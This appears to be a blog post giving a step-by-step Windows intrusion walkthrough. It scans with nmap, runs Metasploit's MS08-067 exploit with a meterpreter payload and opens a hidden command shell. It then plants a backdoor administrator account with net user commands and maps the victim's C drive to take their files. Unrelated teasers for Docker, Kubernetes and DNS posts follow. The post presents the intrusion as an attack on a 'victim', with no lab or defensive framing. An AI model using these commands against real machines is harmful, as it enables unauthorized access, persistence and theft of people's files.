Skip to main content

hack the target system

Main Part:
- We download nmap (nmap.org) so that we can scan the remote pc.
- On the terminal we write: nmap -sS -O
- If you see that ports 139 TCP and 445 TCP are open then everything is exactly as we want it to be.
- Now we download Metasploit (metasploit.org) and we open it via the Terminal.
- Now that Metasploit is running we start the attack.
- We write at the terminal “show exploits” and we get a list of the avaliable exploits.
- We choose the exploit “ms08_067_netapi” by writing “use windows/smb/ms08_067_netapi”
- Now we set RHOST to our victims ip: “set RHOST
- And RPORT to 445: “set RPORT 445″
- Now we write “set SMBPIPE SRVSVC” and hit ENTER and then “set TARGET 0″ and hit ENTER again.
- OK! Let’s set the Payload: “set PAYLOAD windows/meterpreter/bind_tcp”
- IT’S TIME TO HACK THE COMPUTER!!!! Write “exploit” and hit ENTER.
- If everything is ok you should see the following message: “[*] Meterpeter session 1 opened (xxx.xxx.xxx.xxx:xxxx -> xxx.xxx.xxx.xxx:xxxx)
- Meterpeter is running. We are inside the target pc!
- Let’s open the target’s CMD: “execute -f cmd.exe -c -H -i”
- If it says “X:\WINDOWS\System32″ then the mission is accomplished.
- Now lets create our own admin account.
- Write: “net user n0f4t3 mypass /add”. You should see a confirmation message saying “The command completed successfully.”
- Now lets make the account an admin: “net localgroup administrators n0f4t3 /add”.
- You should see again the confirmation message saying: “The command completed successfully.”
- Then type “exit” to exit CMD.
- OMG!! We made it!!! But how can we steal his files????
- We boot from Windows……….
- We go to “Start>Run”, we type “cmd” and we hit ENTER.
- Then we write “net use X: \\\C mypass /user:n0f4t3″ and hit ENTER.
- If that doesn’t work type “net use X: \\\C: mypass /user:n0f4t3″ and hit ENTER
- Now go to “My Computer” and you should see a new Drive called X:. Open it and enjoy the victim’s files.
That’s all Folks!!!

Comments

Post a Comment

Popular posts from this blog

Docker Container Management from Cockpit

Cockpit can manage containers via docker. This functionality is present in the Cockpit docker package. Cockpit communicates with docker via its API via the /var/run/docker.sock unix socket. The docker API is root equivalent, and on a properly configured system, only root can access the docker API. If the currently logged in user is not root then Cockpit will try to escalate the user’s privileges via Polkit or sudo before connecting to the socket. Alternatively, we can create a docker Unix group. Anyone in that docker group can then access the docker API, and gain root privileges on the system. [root@rhel8 ~] #  yum install cockpit-docker    -y  Once the package installed then "containers" section would be added in the dashboard and we can manage the containers and images from the console. We can search or pull an image from docker hub just by searching with the keyword like nginx centos.   Once the Image download...
Post a Comment
Read more

Canonical Kubernetes Platform

Recently,  Canonical has announce the release of the Canonical Kubernetes Platform version 1.32, a robust and user-friendly solution for seamless cluster creation and management. This platform is designed to simplify the deployment and maintenance of containerized workloads, making it an ideal choice for both developers and enterprises. Here are some of the attracting features of this Platform.  ZeroOps with Built-in Essentials:  The platform comes pre-configured with critical components such as networking, DNS, metrics server, local storage, ingress, gateway, and load balancer, enabling immediate productivity post-installation. Simplified Installation and Maintenance:   Leveraging snap packages, the installation process is straightforward, and automated patch upgrades enhance security without manual intervention. Effortless Scalability:  Adding new nodes is seamless, and achieving high availability requires minimal effort, ensuring your infrastructure sca...
Post a Comment
Read more

Setting up DNS service Add-On in kubernetes

Setting up DNS service Add-On in kubernetes What things get DNS names? Every Service defined in the cluster (including the DNS server itself) is assigned a DNS name. By default, a client Pod’s DNS search list will include the Pod’s own namespace and the cluster’s default domain. This is best illustrated by example: Assume a Service named “ my-service ” in the Kubernetes namespace “ dev ” . A Pod running in namespace “ dev ” can look up this service by simply doing a DNS query for “ my-service ” . A Pod running in namespace can look up this service by doing a DNS query for my-service.dev . Kubernetes offers a cluster addon for DNS service discovery, which most environments enable by default. “SkyDNS” seems to be the standard DNS server of choice, since it was designed to work on top of etcd. The “ kube-dns” addon is composed of a kubernetes service which, like all services, is allocated an arbitrary VIP within the preconfigured subnet (this is the IP that every other serv...
Post a Comment
Read more